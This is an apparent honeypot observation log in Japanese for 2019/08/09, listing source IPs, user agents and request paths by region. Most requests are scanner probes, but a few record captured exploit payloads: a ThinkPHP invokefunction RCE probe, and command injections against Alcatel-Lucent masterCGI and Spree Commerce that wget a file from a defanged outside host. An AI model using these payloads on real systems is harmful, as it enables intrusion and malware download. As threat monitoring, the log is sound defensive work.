ハニーポット(仮) 観測記録 2019/08/09分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Jorgeeでのスキャン行為
を確認しました。
Region:US
Alcatel-LucentのIP-PBX製品の脆弱性(CVE-2007-3010)を狙うアクセス
Spree Commerce(OSSのeコマースソフト)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。
Region:EU
phpMyAdminに対するスキャン行為
123[.]125[.]114[.]144に関する不正通信
を確認しました。
他
アクセス数推移
AP:総アクセス数:52 (前日比:+3)
US:総アクセス数:17 (前日比:-43)
EU:総アクセス数:128 (前日比:+116)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 111.206.59.134 | China |
| 2 | 114.57.135.79 | Indonesia |
| 2 | 120.36.227.29 | China |
| 2 | 140.143.158.127 | China |
| 4 | 140.143.16.158 | China |
| 6 | 153.232.255.74 | Japan |
| 1 | 157.55.39.28 | United States |
| 2 | 165.22.215.181 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 181.48.182.234 | Colombia |
| 2 | 18.232.68.234 | United States |
| 4 | 185.142.236.34 | Netherlands |
| 2 | 185.34.33.2 | France |
| 3 | 211.38.144.230 | South Korea |
| 1 | 27.115.124.70 | China |
| 9 | 31.32.230.173 | France |
| 2 | 51.38.36.14 | France |
| 2 | 60.249.146.79 | Taiwan |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.249.70.27 | United States |
| 3 | 77.247.110.69 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
| 1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| 3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 19 | Mozilla/5.0 Jorgee |
| 6 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | python-requests/2.19.1 |
| 2 | python-requests/2.20.1 |
| 2 | python-requests/2.21.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | GET | /db/ | HTTP/1.1 |
| 4 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 3 | GET | /manager/html | HTTP/1.1 |
| 6 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /pma/ | HTTP/1.1 |
| 1 | GET | /PMA/ | HTTP/1.1 |
| 6 | GET | /robots.txt | HTTP/1.1 |
| 2 | GET | /server-status | HTTP/1.1 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | HEAD | /dbadmin/ | HTTP/1.1 |
| 1 | HEAD | /db/ | HTTP/1.1 |
| 4 | HEAD | / | HTTP/1.1 |
| 6 | HEAD | /phpmyadmin/ | HTTP/1.1 |
| 1 | HEAD | /pma/ | HTTP/1.1 |
| 1 | HEAD | /PMA/ | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | HEAD | /robots.txt | HTTP/1.1 |
| 1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 12 | 178.188.9.26 | Austria |
| 1 | 41.216.186.87 | South Africa |
| 1 | 54.39.209.227 | Canada |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 77.247.110.69 | Netherlands |
| 1 | 91.134.120.7 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /cgi-bin/masterCGI?ping=nomip&user=;wget | http://185[.]62[.]189[.]143/richard; |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /?search[send]=eval&search[send][]=Kernel.fork%20do%60wget | http://185[.]62[.]189[.]143/richard; |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | \x03 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 110.167.95.61 | China |
| 1 | 113.24.85.162 | China |
| 1 | 113.57.114.123 | China |
| 1 | 123.145.21.23 | China |
| 1 | 123.145.34.181 | China |
| 1 | 172.104.242.173 | United States |
| 1 | 175.152.31.185 | China |
| 1 | 1.80.2.216 | China |
| 1 | 182.138.158.249 | China |
| 1 | 193.188.22.159 | Russia |
| 1 | 198.108.67.112 | United States |
| 1 | 221.0.23.193 | China |
| 108 | 51.75.19.240 | France |
| 2 | 59.36.132.222 | China |
| 1 | 77.247.110.165 | Netherlands |
| 1 | 77.247.110.69 | Netherlands |
| 4 | 93.174.95.106 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 1 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 |
| 1 | Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36 |
| 108 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
| 2 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
| 1 | python-requests/2.22.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 2 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
| 1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/db/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/db/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/pma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/PMA/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /administrator/web/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/pMA/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/sqladmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/sysadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /admin/web/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /database/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/db-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/dbweb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin-3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/webadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/webdb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/websql/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | http://boxun[.]com/ | HTTP/1.1 |
| 1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
| 1 | GET | http://www[.]baidu[.]com/ | HTTP/1.1 |
| 1 | GET | http://www[.]ip[.]cn/ | HTTP/1.1 |
| 1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
| 1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
| 1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
| 1 | GET | /index.php?lang=en | HTTP/1.1 |
| 1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysqladmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/db/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/pma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/pMA/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/web/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2011/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2012/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2013/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2014/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2015/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2016/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2017/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2018/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2019/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin-3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /php-my-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /php-myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmy-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2011/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2011/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2012/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2012/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2013/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2013/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2014/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2014/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2015/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2015/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2016/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2016/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2017/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2017/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2018/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA2018/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma2019/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /program/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/phpmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/phpMyAdmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/php-myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/phpmy-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/sql-admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/sqladmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/sql/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/sqlweb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/webadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/webdb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /sql/websql/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
| 1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
| 2 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | \x03 | ||
| 1 | \x16\x03\x01 |
